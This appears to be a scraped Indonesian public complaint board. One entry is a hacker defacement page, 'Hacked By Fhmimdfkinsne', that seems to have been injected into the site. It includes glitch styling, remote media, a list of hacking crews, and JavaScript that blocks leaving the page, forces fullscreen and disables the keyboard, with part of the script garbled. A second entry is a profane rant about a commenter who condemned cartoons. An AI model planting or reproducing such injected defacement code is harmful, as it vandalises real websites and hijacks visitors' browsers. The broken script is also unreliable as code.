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Pojok Aduan
hacked by fhmimdfkinsne | Hacked By Fhmimdfkinsne body, a:hover { cursor: url(http://cur.cursors-4u.net/symbols/sym-1/sym46.cur), progress !important; } center { font-family: Courier; } img { opacity: 80%; } red { color: red; } #background-video { height: 100vh; width: 100vw; object-fit: cover; position: fixed; left: 0; right: 0; top: 0; bottom: 0; z-index: -1; } font { text-shadow: #000 0px 0px 3px; -webkit-font-smoothing: antialiased; } div { animation: glitch 1s linear infinite; } @keyframes glitch { 2%, 64% { transform: translate(2px, 0) skew(0deg); } 4%, 60% { transform: translate(-2px, 0) skew(0deg); } 62% { transform: translate(0, 0) skew(5deg); } } div:before, div:after { content: attr(title); position: absolute; left: 0; } div:before { animation: glitchTop 1s linear infinite; clip-path: polygon(0 0, 100% 0, 100% 33%, 0 33%); -webkit-clip-path: polygon(0 0, 100% 0, 100% 33%, 0 33%); } @keyframes glitchTop { 2%, 64% { transform: translate(2px, -2px); } 4%, 60% { transform: translate(-2px, 2px); } 62% { transform: translate(13px, -1px) skew(-13deg); } } div:after { animation: glitchBotom 1.5s linear infinite; clip-path: polygon(0 67%, 100% 67%, 100% 100%, 0 100%); -webkit-clip-path: polygon(0 67%, 100% 67%, 100% 100%, 0 100%); } @keyframes glitchBotom { 2%, 64% { transform: translate(-2px, 0); } 4%, 60% { transform: translate(-2px, 0); } 62% { transform: translate(-22px, 5px) skew(21deg); } } window.onbeforeunload = confirmExit; function confirmExit() { return "are you sure ? wkwk"; } function fs() { var elem = document.documentElement; if (elem.requestFullscreen) { elem.requestFullscreen(); } else if (elem.msRequestFullscreen) { elem.msRequestFullscreen(); } else if (elem.mozRequestFullScreen) { elem.mozRequestFullScreen(); } else if (elem.webkitRequestFullscreen) { elem.webkitRequestFullscreen(); } document.getElementById("body").style.cursor = 'none'; document.onkeydown = function(e) { return false; } document.addEventListener("keydown", e => { if (e.key == "F11") e.preventDefault(); }); } document.addEventListener('DOMContentLoaded', function (event) { // array with texts to type in typewriter var dataText = ["Wh00pz ! your security get down !", "Patch it now ! before got hacked again !", "Don't worry, your files are safe.", "Remember ! We are party at your security !"]; // type one text in the typwriter // keeps calling itself until the text is finished function typeWriter(text, i, fnCallback) { // chekc if text isn't finished yet if (i eout(fnCallback, 7000); } } // start a typewriter animation for a text in the dataText array function StartTextAnimation(i) { if (typeof dataText[i] == 'undefined') { setTimeout(function () { StartTextAnimation(0); }, 30000); } // check if dataText[i] exists if (i < dataText[i].length) { // text exists! start typewriter animation typeWriter(dataText[i], 0, function () { // after callback (and whole text has been animated), start next text StartTextAnimation(i + 1); }); } } // start the text animation StartTextAnimation(0); }); //# sourceURL=pen.js </script> <audio src="https://f.top4top.io/m_1601xitpu9.mp3" autoplay="true" id="lagu" loop=""></audio> <video id="background-video" src="https://github.com/anonseven/heker/raw/main/v2/videoplayback.webm" autoplay="" loop="" muted="" style="position: fixed;object-fit: cover;" poster="data:image/png;base64, iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNk+A8AAQUBAScY42YAAAAASUVORK5CYII="> <source src="https://github.com/anonseven/heker/raw/main/v2/videoplayback.webm" type="video/webm"> </video> <table width="100%" height="80%"> <td> <center> <small>CUKIMAY CYBER TEAM</small> <br> <img src="https://d.top4top.io/p_2886w36u59.png" width="220" height="220" loading="lazy" onerror="this.style.display = 'none'"> <br>Hacked By <red><i>Fhmimdfkinsne</i></red><br> <font size="2" id="hekerabies"></font><br><br> <small> <font size="1" color="gray">kangpepes@protonmail.com</font> </small> </div> <div class="footer-greetings"> <marquee> <font size="2"> <b>Greetz</b> : Sukabumi BlackHat | LulzGhost Team | Kelelawar Cyber Team | Anonsec Team | Anon7 | Type-0 | ./meicookies | MR.HAGAN_404CR4ZY | PohonSagu | FarisGanss | KosameAmegai | K4TSUY4-GH05T | He4l3rz | Unkown1337 | Mr.Grim | Rian Haxor | ChokkaXploiter | MungielL | Nzxsx7 | ./G1L4N6_ST86 | kuroaMEpiKAcyu | UnknownSec | ./Tikus_HaXoR | Temp3 | Mr.L3gacy | xRyukz | Mr.Crifty | Rava | Cubjrnet7 | Calutax07 |Mr.Spongebob | Cr4byP4tty |Rzky0 |Uknown7 | Hadii6666h0$T | PsychoH4x0r | 1T4_KUM4 | ./Ray Xploit | Tn.Error404 | ./XH4YP3R1337 |Ghee1337 | Twenty4 | Malaikat Hati | RidhoHaxor | EL | Mirae7 | R13S | Mrlinkerrorsystem | Lars | Andra | Jeager | Garou | ./MarioGanz </font> </marquee> </div> </td> </table> ' |
Pojok Apresiasi
Mechamato | M qorid ( J A N C O K ) Apakah Anda tidak memiliki bahasa yang dapat dipahami manusia, Saat Anda menyamar menjadi tukang khotbah di kolom komentar, dan anda secara sengaja mengharamkan film kartun yang dari asalnya hanya dibuat sedikit episode, sehingga kalau tayang di TV pun setiap hari ngulang episode terus. Dan saya memikirkan M qorid ini atas kelancangan dalam berbicara soal film kartun yang anda maksud, ternyata saat saya membuka daftar film kartun yang dilecehkan M qorid, disitu ada kategori film kartun, seperti Ejen Ali dan Boboiboy (kecuali BoBoiBoy Galaxy) sekarang kesalahan anda inilah saya menjadi sakit berat, saat mendengar audio TV berkumandang menyebabkan hati tidak nyaman, terlebih kalau mendengar audio TV dalam keadaan tidur, dalam tidur pun bisa marah gara gara memikirkan kamu M qorid jahat. terima kasih semoga ada yang mengurus masalah ketidak adilan yang sudah muncul agak lama, tapi tidak apa apa, kami minta hal semacam ini jangan sampai terjadi lagi dan semoga KPI mau meladeni saya untuk mengijinkan program TV kepada BoBoiBoy galaxy tetap ditayangkan selamanya. |